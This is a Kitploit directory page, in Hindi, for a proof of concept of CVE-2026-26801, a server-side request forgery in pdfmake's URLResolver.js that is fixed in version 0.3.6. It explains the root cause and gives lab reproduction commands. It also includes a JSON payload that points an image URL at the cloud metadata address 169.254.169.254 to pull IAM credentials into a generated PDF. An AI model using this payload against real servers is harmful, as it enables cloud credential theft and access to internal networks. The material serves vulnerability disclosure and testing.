Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-26801-pdfmake-ssrf — PoC for CVE-2026-26801: pdfmake URLResolver.js में SSRF (>= 0.3.0-beta.2, <= 0.3.5) | Kitploit
उपकरण/GitHubGitHub/mariopepe/cve-2026-26801-pdfmake-ssrf
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनावेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmariopepe/cve-2026-26801-pdfmake-ssrf

CVE-2026-26801-pdfmake-ssrf

PoC for CVE-2026-26801: pdfmake URLResolver.js में SSRF (>= 0.3.0-beta.2, <= 0.3.5)

रिपॉजिटरी देखें
46 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

pdfmake SSRF भेद्यता PoC

भेद्यता सारांश

फ़ील्डमान
पैकेजpdfmake
संस्करण>= 0.3.0-beta.2, <= 0.3.5
फिक्स्ड0.3.6
CVECVE-2026-26801
प्रकारसर्वर-साइड रिक्वेस्ट फोर्जरी (SSRF)
स्थानsrc/URLResolver.js
गंभीरताउच्च

मूल कारण

root@kitploit:~
// URLResolver.js line 3
const response = await fetch(url, { headers });  // NO VALIDATION!

जब docDefinition में images, attachments, या files में URL होते हैं, pdfmake उन्हें बिना किसी सत्यापन के प्राप्त करता है:

  • डोमेन के लिए कोई allowlist/blocklist नहीं
  • आंतरिक IP (127.0.0.1, 169.254.169.254, 10.x.x.x) के खिलाफ कोई सुरक्षा नहीं
  • कस्टम हेडर समर्थित (प्रमाणीकरण बायपास सक्षम करता है)

पुनरुत्पादन

सेटअप

root@kitploit:~
npm install

टर्मिनल 1 - मॉक AWS मेटाडेटा सर्वर

root@kitploit:~
npm run metadata

टर्मिनल 2 - भेद्य PDF सर्वर

root@kitploit:~
npm run server

टर्मिनल 3 - हमला निष्पादित करें

ब्लाइंड SSRF (साबित करता है कि सर्वर आउटबाउंड अनुरोध करता है):

root@kitploit:~
npm run attack

पूर्ण रीड SSRF (क्रेडेंशियल जनरेट किए गए PDF में एम्बेडेड):

root@kitploit:~
npm run exfiltrate

अपेक्षित परिणाम

ब्लाइंड SSRF (npm run attack)

मेटाडेटा सर्वर आउटपुट:

root@kitploit:~
[METADATA] GET /latest/meta-data/iam/security-credentials/vulnerable-ec2-role
[METADATA] >>> CREDENTIALS LEAKED! <<<

यह साबित करता है कि भेद्य सर्वर ने हमारे नियंत्रित एंडपॉइंट पर आउटबाउंड अनुरोध किया।

पूर्ण रीड SSRF (npm run exfiltrate)

हमला स्क्रिप्ट exfiltrated.pdf जनरेट करती है। इसे किसी भी PDF व्यूअर में खोलें और AWS क्रेडेंशियल JSON एक फ़ाइल अटैचमेंट (metadata.json) के रूप में एम्बेडेड है। यह केवल ब्लाइंड SSRF नहीं, बल्कि पूर्ण डेटा एक्सफिल्ट्रेशन साबित करता है। हमलावर को वास्तविक प्रतिक्रिया बॉडी PDF के अंदर वापस मिलती है।

वास्तविक-विश्व प्रभाव

  1. AWS/GCP/Azure क्रेडेंशियल चोरी - क्लाउड मेटाडेटा एंडपॉइंट तक पहुंच
  2. आंतरिक नेटवर्क एक्सेस - आंतरिक सेवाओं तक पहुंच
  3. पोर्ट स्कैनिंग - आंतरिक इंफ्रास्ट्रक्चर की गणना
  4. प्रमाणीकरण बायपास - प्रमाणीकरण को बायपास करने के लिए कस्टम हेडर

हमला पेलोड

root@kitploit:~
{
  "content": ["Hello"],
  "images": {
    "x": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"
  }
}

राइटअप

यह कैसे पाया गया, हमले की श्रृंखला, और प्रकटीकरण समयरेखा की कहानी के साथ पूर्ण तकनीकी राइटअप: mariopepe.github.io/cve-2026-26801-pdfmake-ssrf

टूल डाउनलोड करें